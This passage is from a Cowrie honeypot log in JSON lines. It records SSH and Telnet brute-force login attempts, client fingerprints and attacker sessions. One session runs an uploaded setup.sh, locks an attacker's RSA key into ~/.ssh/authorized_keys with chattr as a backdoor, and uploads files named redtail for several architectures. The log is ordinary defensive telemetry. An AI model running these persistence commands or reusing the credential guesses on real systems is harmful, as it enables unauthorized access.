98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T18:36:48.894696Z","src_ip":"212.227.235.229","session":"4a2df793b39e"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX#EDC","message":"login attempt [root/!QAZ@WSX#EDC] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:36:49.211096Z","src_ip":"212.227.235.229","session":"4a2df793b39e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:36:49.437216Z","src_ip":"212.227.235.229","session":"4a2df793b39e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T18:36:49.437986Z","src_ip":"212.227.235.229","session":"4a2df793b39e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:36:49.548002Z","src_ip":"212.227.235.229","session":"4a2df793b39e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:36:49.549368Z","src_ip":"212.227.235.229","session":"4a2df793b39e"}
{"eventid":"cowrie.session.connect","src_ip":"159.203.44.34","src_port":59772,"dst_ip":"1.2.3.4","dst_port":23,"session":"667d40a8871c","protocol":"telnet","message":"New connection: 159.203.44.34:59772 (1.2.3.4:23) [session: 667d40a8871c]","sensor":"my-vps","timestamp":"2025-08-28T18:37:21.359912Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T18:37:21.684430Z","src_ip":"159.203.44.34","session":"667d40a8871c"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T18:37:23.026121Z","src_ip":"159.203.44.34","session":"667d40a8871c"}
{"eventid":"cowrie.session.closed","duration":4.542264938354492,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:37:25.902104Z","src_ip":"159.203.44.34","session":"667d40a8871c"}
{"eventid":"cowrie.session.connect","src_ip":"159.203.44.34","src_port":55536,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a54da0593cc","protocol":"telnet","message":"New connection: 159.203.44.34:55536 (1.2.3.4:23) [session: 7a54da0593cc]","sensor":"my-vps","timestamp":"2025-08-28T18:37:26.038281Z"}
{"eventid":"cowrie.session.closed","duration":1.4010896682739258,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:37:27.439305Z","src_ip":"159.203.44.34","session":"7a54da0593cc"}
{"eventid":"cowrie.session.connect","src_ip":"159.203.44.34","src_port":55552,"dst_ip":"1.2.3.4","dst_port":23,"session":"c7d5e0d37aea","protocol":"telnet","message":"New connection: 159.203.44.34:55552 (1.2.3.4:23) [session: c7d5e0d37aea]","sensor":"my-vps","timestamp":"2025-08-28T18:37:27.531219Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:37:27.774401Z","src_ip":"159.203.44.34","session":"c7d5e0d37aea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:37:27.790755Z","src_ip":"159.203.44.34","session":"c7d5e0d37aea"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T18:37:27.904904Z","src_ip":"159.203.44.34","session":"c7d5e0d37aea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:37:30.384263Z","src_ip":"159.203.44.34","session":"c7d5e0d37aea"}
{"eventid":"cowrie.session.closed","duration":2.856173515319824,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:37:30.387300Z","src_ip":"159.203.44.34","session":"c7d5e0d37aea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62061,"dst_ip":"1.2.3.4","dst_port":22,"session":"34fb2893dcc1","protocol":"ssh","message":"New connection: 212.227.125.160:62061 (1.2.3.4:22) [session: 34fb2893dcc1]","sensor":"my-vps","timestamp":"2025-08-28T18:37:43.691290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:37:44.165928Z","src_ip":"212.227.125.160","session":"34fb2893dcc1"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:37:44.249545Z","src_ip":"212.227.125.160","session":"34fb2893dcc1"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall","message":"login attempt [randall/randall] failed","sensor":"my-vps","timestamp":"2025-08-28T18:37:44.670643Z","src_ip":"212.227.125.160","session":"34fb2893dcc1"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall1","message":"login attempt [randall/randall1] failed","sensor":"my-vps","timestamp":"2025-08-28T18:37:45.757693Z","src_ip":"212.227.125.160","session":"34fb2893dcc1"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall123","message":"login attempt [randall/randall123] failed","sensor":"my-vps","timestamp":"2025-08-28T18:37:46.845541Z","src_ip":"212.227.125.160","session":"34fb2893dcc1"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall1234","message":"login attempt [randall/randall1234] failed","sensor":"my-vps","timestamp":"2025-08-28T18:37:47.933309Z","src_ip":"212.227.125.160","session":"34fb2893dcc1"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall12345","message":"login attempt [randall/randall12345] failed","sensor":"my-vps","timestamp":"2025-08-28T18:37:49.020488Z","src_ip":"212.227.125.160","session":"34fb2893dcc1"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:37:50.107299Z","src_ip":"212.227.125.160","session":"34fb2893dcc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":10954,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffcf6ca4ecab","protocol":"ssh","message":"New connection: 212.227.125.160:10954 (1.2.3.4:22) [session: ffcf6ca4ecab]","sensor":"my-vps","timestamp":"2025-08-28T18:38:40.354025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:38:40.355380Z","src_ip":"212.227.125.160","session":"ffcf6ca4ecab"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:38:40.436480Z","src_ip":"212.227.125.160","session":"ffcf6ca4ecab"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123456","message":"login attempt [admin/admin123456] failed","sensor":"my-vps","timestamp":"2025-08-28T18:38:40.850277Z","src_ip":"212.227.125.160","session":"ffcf6ca4ecab"}
{"eventid":"cowrie.login.failed","username":"admin","password":"lfr42100","message":"login attempt [admin/lfr42100] failed","sensor":"my-vps","timestamp":"2025-08-28T18:38:41.938285Z","src_ip":"212.227.125.160","session":"ffcf6ca4ecab"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@321","message":"login attempt [admin/admin@321] failed","sensor":"my-vps","timestamp":"2025-08-28T18:38:43.022624Z","src_ip":"212.227.125.160","session":"ffcf6ca4ecab"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123","message":"login attempt [admin/123] failed","sensor":"my-vps","timestamp":"2025-08-28T18:38:44.106046Z","src_ip":"212.227.125.160","session":"ffcf6ca4ecab"}
{"eventid":"cowrie.login.failed","username":"admin","password":"asdfghjkl","message":"login attempt [admin/asdfghjkl] failed","sensor":"my-vps","timestamp":"2025-08-28T18:38:45.189806Z","src_ip":"212.227.125.160","session":"ffcf6ca4ecab"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:38:46.273690Z","src_ip":"212.227.125.160","session":"ffcf6ca4ecab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40410,"dst_ip":"1.2.3.4","dst_port":22,"session":"70681537da8f","protocol":"ssh","message":"New connection: 212.227.125.160:40410 (1.2.3.4:22) [session: 70681537da8f]","sensor":"my-vps","timestamp":"2025-08-28T18:39:17.691742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:39:17.693176Z","src_ip":"212.227.125.160","session":"70681537da8f"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T18:39:17.756476Z","src_ip":"212.227.125.160","session":"70681537da8f"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:39:27.692218Z","src_ip":"212.227.125.160","session":"70681537da8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41598,"dst_ip":"1.2.3.4","dst_port":23,"session":"391045c0aafa","protocol":"telnet","message":"New connection: 212.227.235.229:41598 (1.2.3.4:23) [session: 391045c0aafa]","sensor":"my-vps","timestamp":"2025-08-28T18:39:48.320928Z"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.157","src_port":53458,"dst_ip":"1.2.3.4","dst_port":22,"session":"3688915eb1f1","protocol":"ssh","message":"New connection: 193.32.162.157:53458 (1.2.3.4:22) [session: 3688915eb1f1]","sensor":"my-vps","timestamp":"2025-08-28T18:40:05.312099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:40:07.335037Z","src_ip":"193.32.162.157","session":"3688915eb1f1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T18:40:07.335812Z","src_ip":"193.32.162.157","session":"3688915eb1f1"}
{"eventid":"cowrie.login.success","username":"root","password":"Ucms9ZB4@1992","message":"login attempt [root/Ucms9ZB4@1992] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:40:14.380306Z","src_ip":"193.32.162.157","session":"3688915eb1f1"}
{"eventid":"cowrie.session.closed","duration":"14.0","message":"Connection lost after 14.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:40:19.301594Z","src_ip":"193.32.162.157","session":"3688915eb1f1"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.157","src_port":63626,"dst_ip":"1.2.3.4","dst_port":22,"session":"83fe00e213ea","protocol":"ssh","message":"New connection: 193.32.162.157:63626 (1.2.3.4:22) [session: 83fe00e213ea]","sensor":"my-vps","timestamp":"2025-08-28T18:40:19.330578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:40:19.331431Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.client.kex","hassh":"5f904648ee8964bef0e8834012e26003","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 5f904648ee8964bef0e8834012e26003","sensor":"my-vps","timestamp":"2025-08-28T18:40:19.361522Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.login.success","username":"root","password":"Ucms9ZB4@1992","message":"login attempt [root/Ucms9ZB4@1992] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:40:19.454059Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.session.closed","duration":31.702933311462402,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:40:20.023769Z","src_ip":"212.227.235.229","session":"391045c0aafa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:40:26.592407Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.command.input","input":"chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","message":"CMD: chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","sensor":"my-vps","timestamp":"2025-08-28T18:40:26.593193Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","size":80,"shasum":"96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:40:26.624959Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-28T18:40:26.655669Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-28T18:40:26.657635Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-28T18:40:26.660431Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-28T18:40:26.662938Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-28T18:40:26.665365Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-28T18:40:26.666494Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:40:26.698236Z","src_ip":"193.32.162.157","session":"83fe00e213ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46728,"dst_ip":"1.2.3.4","dst_port":22,"session":"34021282b15b","protocol":"ssh","message":"New connection: 212.227.235.229:46728 (1.2.3.4:22) [session: 34021282b15b]","sensor":"my-vps","timestamp":"2025-08-28T18:40:39.360451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:40:39.361182Z","src_ip":"212.227.235.229","session":"34021282b15b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp5